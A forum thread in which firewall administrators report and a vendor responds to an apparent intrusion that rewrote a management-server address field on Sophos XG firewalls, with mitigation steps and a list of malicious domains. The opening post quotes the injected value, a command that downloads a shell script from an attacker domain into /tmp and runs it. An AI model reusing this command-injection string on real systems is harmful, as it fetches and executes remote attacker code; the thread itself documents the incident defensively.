Thread Info
  • State Verified Answer
  • +9 person also asked this people also asked this
  • Locked Locked
  • Replies 14 replies
  • Subscribers 43 subscribers
  • Views 8081 views
  • Users 0 members are here
Options
Suggested
This discussion has been locked.
You can no longer post new replies to this discussion. If you have a question you can start a new discussion

XG firewalls connected to SFM were no longer able to connect or synchronize to SFM. - Notice the following change on the settings

Ninjatech1969

Hello All,

Weird issues we notice today the XG firewalls connected to SFM were no longer able to connect or synchronize to SFM.

After looking at the settings on the XG firewalls affected we noticed that in place of the SFM IP address was this parameter: 

||cd /tmp/ && wget sophosfirewallupdate.com/.../Install.sh -O /tmp/x.sh && chmod 777 /tmp/x.sh && sh /tmp/x.sh|| 

After removing this parameter and pointing it to our SFM IP we were able to get that firewall to successfully synchronize and connect to SFM.

What I want to know is what could have cause that settings to change. No one from our team has made this change. I believe SFM templates does not have the capability to push this settings.

This is very concerning and alarming and would like to know if anyone has any ideas or where to look.  I already opened a case with Sophos and was on the phone with them for about

3 hours reviewing and grabbing logs.Thoughts on this ! - Attach screenshot of one of the XG firewall

 



This thread was automatically locked due to age.
  • 0

    We just discovered this too and have opened a support case.

    After setting the value back to the IP of the SFM, it revert to the invalid value when we try to push a rule out.

     

    It has probably been happening for a few weeks.

  • 0

    Hi  and  

    We sincerely regret any inconvenience this has caused. Sophos is investigating and will be updating this thread with more details as they unfold.

  • +1 in reply to Yashraj S
    **Update 2020/04/25 01:00 Pacific
    Please visit this KBA for more information.
     
    **UPDATE 2020/04/23 21:00 Pacific
    Earlier today, some customers reported a discrepancy in the SFM server address field on their Firewalls. Sophos provided initial steps to mitigate the issue and this update provides additional recommendations as we continue to investigate the issue and corrective actions.
     
    The symptom suggests potential unauthorized access. The following mitigations have been confirmed to eliminate the issue while we automate a software-based remedy.
     
    1. The issue can only manifest itself on systems that have exposed the HTTPS admin services or the User Portal on the WAN interface. To prevent this issue, choose the “Administration” link on the left-hand navigation panel of the management console, to get to the “Device Access” page illustrated below where customers must ensure that both Admin services and User Portal are deactivated on the WAN interface as highlighted:



      Note: If you currently rely on WAN-based Admin services, we recommend you have configured one of the following BEFORE deactivating these services:

      Administering your Firewall via Sophos Central (recommended):
      https://community.sophos.com/kb/en-us/127461

      Administering your Firewall via Remote Access VPN:
      https://community.sophos.com/kb/en-us/133109

      Sophos Customer Support is available to assist you in completing the steps above as necessary.
      Please reach us at: https://secure2.sophos.com/en-us/support/open-a-support-case.aspx

    2. Affected firewalls have been observed communicating with the following list of unauthorized hosts. Add all the following domains (these are not Sophos domain properties) as DNS host entries and define the IP address as 52.214.97.178 (a Sophos property which will eliminate the unauthorized traffic):

      • sophostraining.org
      • sophosproductupdate.com
      • sophosenterprisecenter.com
      • sophoswarehouse.com
      • Ragnarokfromasgard.com
      • sophosfirewallupdate.com
        For assistance on adding these domains as DNS host entries, please refer to these instructions.

    3. Contact Sophos Support by phone or email to open a case. We will ensure you receive any future communications on this issue.

     

     Additional screenshots for reference:

  • 0 in reply to MarcoGinocchio

    I was referred to this post by Sophos support due to the issue linked bellow:

    https://community.sophos.com/products/unified-threat-management/f/network-protection-firewall-nat-qos-ips/119975/advanced-threat-protection-triggering-on-sophosproductupdate-com

    A question they have yet to answer is why are we being asked to associate domains that Sophos does not own to an IP that also has unknown ownership? I was sent to this post without any clear explanation of why it should be followed. Can anyone here clarify why the dns override above was proposed? 

    Thanks,

    D.V.

  • 0 in reply to D_Valinske

    I suspect we'll find out they hard coded some URL into their appliances or SFM and either didn't register them or stopped registering them (hangover from UTM?)

     

    Most of the domains are newly registered 28th March so someone either got lucky or found them and registered them.

     

    100% sure the IP is in control of Sophos which is why they are asking to redirect there so the update mechanism downloads an empty file.

  • 0 in reply to MarcoGinocchio

    Hello Marco,

    could you please explain to me how is it possible that the XG Firewall has obtained EAL4 + certification when it flows into it from all sides?!?

    I'm sorry but I really can't understand it. Perhaps only that obtaining this certification was very, very expensive ...
    I think you understand what I mean?

    Regards

    alda

  • 0 in reply to MarcoGinocchio

    I'd also like to ask why the only notification of this issue was posted to the Community forums and not e-mailed directly to partners and end users upon discovery?  Not everyone watches these forums 24/7.  This should not be the office place to release these notifications.

  • 0 in reply to AdamB

    Also, do we have to worry about saved credentials for things like AD/LDAP servers?   Can you please share a copy of x.sh so we can understand what actions were executed?

  • 0 in reply to AdamB

    Hi AdamBasalyga,

    We will soon release more details of the attack and its payloads. Please follow our https://community.sophos.com/kb/en-us/135412 for further updates.

  • 0 in reply to MarcoGinocchio

    I look at this:

    Affected firewalls have been observed communicating with the following list of unauthorized hosts. Add all the following domains (these are not Sophos domain properties) as DNS host entries and define the IP address as 52.214.97.178 (a Sophos property which will eliminate the unauthorized traffic):

    • sophostraining.org
    • sophosproductupdate.com
    • sophosenterprisecenter.com
    • sophoswarehouse.com
    • Ragnarokfromasgard.com
    • sophosfirewallupdate.com
      For assistance on adding these domains as DNS host entries, please refer to these instructions.

    And found that some of our desktops were communicating with some of these addresses as early as the 4th of April .

    Seems anormal to me.  Did XG leak from WAN to make it to our desktops ??????

    Please a quick response.

    Paul Jr